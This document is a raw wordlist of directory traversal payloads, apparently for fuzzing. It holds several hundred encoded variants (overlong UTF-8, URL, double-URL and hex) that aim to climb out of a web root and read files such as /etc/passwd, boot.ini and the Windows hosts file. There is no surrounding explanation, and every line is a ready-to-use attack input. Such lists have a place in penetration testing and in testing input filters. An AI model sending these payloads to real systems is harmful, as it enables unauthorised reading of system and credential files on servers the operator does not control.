-%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\etc\issue -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\boot.ini -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\windows\system32\drivers\etc\hosts -%c0.%c0.%2fetc%2fpasswd -%c0.%c0.%2fetc%2fissue -%c0.%c0.%2fboot.ini -%c0.%c0.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0.%c0.%2f%c0.%c0.%2fetc%2fpasswd -%c0.%c0.%2f%c0.%c0.%2fetc%2fissue -%c0.%c0.%2f%c0.%c0.%2fboot.ini -%c0.%c0.%2f%c0.%c0.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fetc%2fpasswd -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fetc%2fissue -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fboot.ini -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fetc%2fpasswd -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fetc%2fissue -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fboot.ini -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fetc%2fpasswd -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fetc%2fissue -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fboot.ini -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fetc%2fpasswd -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fetc%2fissue -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fboot.ini -%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2f%c0.%c0.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0.%c0.%5cetc%5cpasswd -%c0.%c0.%5cetc%5cissue -%c0.%c0.%5cboot.ini -%c0.%c0.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0.%c0.%5c%c0.%c0.%5cetc%5cpasswd -%c0.%c0.%5c%c0.%c0.%5cetc%5cissue -%c0.%c0.%5c%c0.%c0.%5cboot.ini -%c0.%c0.%5c%c0.%c0.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cetc%5cpasswd -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cetc%5cissue -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cboot.ini -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cetc%5cpasswd -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cetc%5cissue -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cboot.ini -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cetc%5cpasswd -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cetc%5cissue -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cboot.ini -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cetc%5cpasswd -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cetc%5cissue -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cboot.ini -%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5c%c0.%c0.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0.%c0.0x2fetc0x2fpasswd -%c0.%c0.0x2fetc0x2fissue -%c0.%c0.0x2fboot.ini -%c0.%c0.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fpasswd -%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fissue -%c0.%c0.0x2f%c0.%c0.0x2fboot.ini -%c0.%c0.0x2f%c0.%c0.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fpasswd -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fissue -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fboot.ini -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fpasswd -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fissue -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fboot.ini -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fpasswd -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fissue -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fboot.ini -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fpasswd -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fetc0x2fissue -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fboot.ini -%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2f%c0.%c0.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0.%c0.0x5cetc0x5cpasswd -%c0.%c0.0x5cetc0x5cissue -%c0.%c0.0x5cboot.ini -%c0.%c0.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cpasswd -%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cissue -%c0.%c0.0x5c%c0.%c0.0x5cboot.ini -%c0.%c0.0x5c%c0.%c0.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cpasswd -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cissue -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cboot.ini -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cpasswd -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cissue -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cboot.ini -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cpasswd -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cissue -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cboot.ini -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cpasswd -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cetc0x5cissue -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cboot.ini -%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5c%c0.%c0.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0.%c0.%252fetc%252fpasswd -%c0.%c0.%252fetc%252fissue -%c0.%c0.%252fboot.ini -%c0.%c0.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0.%c0.%252f%c0.%c0.%252fetc%252fpasswd -%c0.%c0.%252f%c0.%c0.%252fetc%252fissue -%c0.%c0.%252f%c0.%c0.%252fboot.ini -%c0.%c0.%252f%c0.%c0.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fetc%252fpasswd -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fetc%252fissue -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fboot.ini -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fetc%252fpasswd -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fetc%252fissue -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fboot.ini -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fetc%252fpasswd -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fetc%252fissue -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fboot.ini -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fetc%252fpasswd -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fetc%252fissue -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fboot.ini -%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252f%c0.%c0.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0.%c0.%255cetc%255cpasswd -%c0.%c0.%255cetc%255cissue -%c0.%c0.%255cboot.ini -%c0.%c0.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0.%c0.%255c%c0.%c0.%255cetc%255cpasswd -%c0.%c0.%255c%c0.%c0.%255cetc%255cissue -%c0.%c0.%255c%c0.%c0.%255cboot.ini -%c0.%c0.%255c%c0.%c0.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cetc%255cpasswd -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cetc%255cissue -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cboot.ini -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cetc%255cpasswd -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cetc%255cissue -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cboot.ini -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cetc%255cpasswd -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cetc%255cissue -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cboot.ini -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cetc%255cpasswd -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cetc%255cissue -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cboot.ini -%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255c%c0.%c0.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0.%c0.%c0%2fetc%c0%2fpasswd -%c0.%c0.%c0%2fetc%c0%2fissue -%c0.%c0.%c0%2fboot.ini -%c0.%c0.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fpasswd -%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fissue -%c0.%c0.%c0%2f%c0.%c0.%c0%2fboot.ini -%c0.%c0.%c0%2f%c0.%c0.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fpasswd -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fissue -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fboot.ini -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fpasswd -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fissue -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fboot.ini -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fpasswd -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fissue -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fboot.ini -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fpasswd -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fetc%c0%2fissue -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fboot.ini -%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2f%c0.%c0.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0.%c0.%c0%afetc%c0%afpasswd -%c0.%c0.%c0%afetc%c0%afissue -%c0.%c0.%c0%afboot.ini -%c0.%c0.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afpasswd -%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afissue -%c0.%c0.%c0%af%c0.%c0.%c0%afboot.ini -%c0.%c0.%c0%af%c0.%c0.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afpasswd -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afissue -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afboot.ini -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afpasswd -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afissue -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afboot.ini -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afpasswd -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afissue -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afboot.ini -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afpasswd -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afetc%c0%afissue -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afboot.ini -%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%af%c0.%c0.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0.%c0.%c0%5cetc%c0%5cpasswd -%c0.%c0.%c0%5cetc%c0%5cissue -%c0.%c0.%c0%5cboot.ini -%c0.%c0.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cpasswd -%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cissue -%c0.%c0.%c0%5c%c0.%c0.%c0%5cboot.ini -%c0.%c0.%c0%5c%c0.%c0.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cpasswd -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cissue -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cboot.ini -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cpasswd -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cissue -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cboot.ini -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cpasswd -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cissue -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cboot.ini -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cpasswd -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cetc%c0%5cissue -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cboot.ini -%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5c%c0.%c0.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0.%c0.%c1%9cetc%c1%9cpasswd -%c0.%c0.%c1%9cetc%c1%9cissue -%c0.%c0.%c1%9cboot.ini -%c0.%c0.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cpasswd -%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cissue -%c0.%c0.%c1%9c%c0.%c0.%c1%9cboot.ini -%c0.%c0.%c1%9c%c0.%c0.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cpasswd -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cissue -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cboot.ini -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cpasswd -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cissue -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cboot.ini -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cpasswd -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cissue -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cboot.ini -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cpasswd -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cetc%c1%9cissue -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cboot.ini -%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9c%c0.%c0.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0.%c0.%c1%pcetc%c1%pcpasswd -%c0.%c0.%c1%pcetc%c1%pcissue -%c0.%c0.%c1%pcboot.ini -%c0.%c0.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcpasswd -%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcissue -%c0.%c0.%c1%pc%c0.%c0.%c1%pcboot.ini -%c0.%c0.%c1%pc%c0.%c0.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcpasswd -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcissue -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcboot.ini -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcpasswd -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcetc%c1%pcissue -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcboot.ini -%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pc%c0.%c0.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts 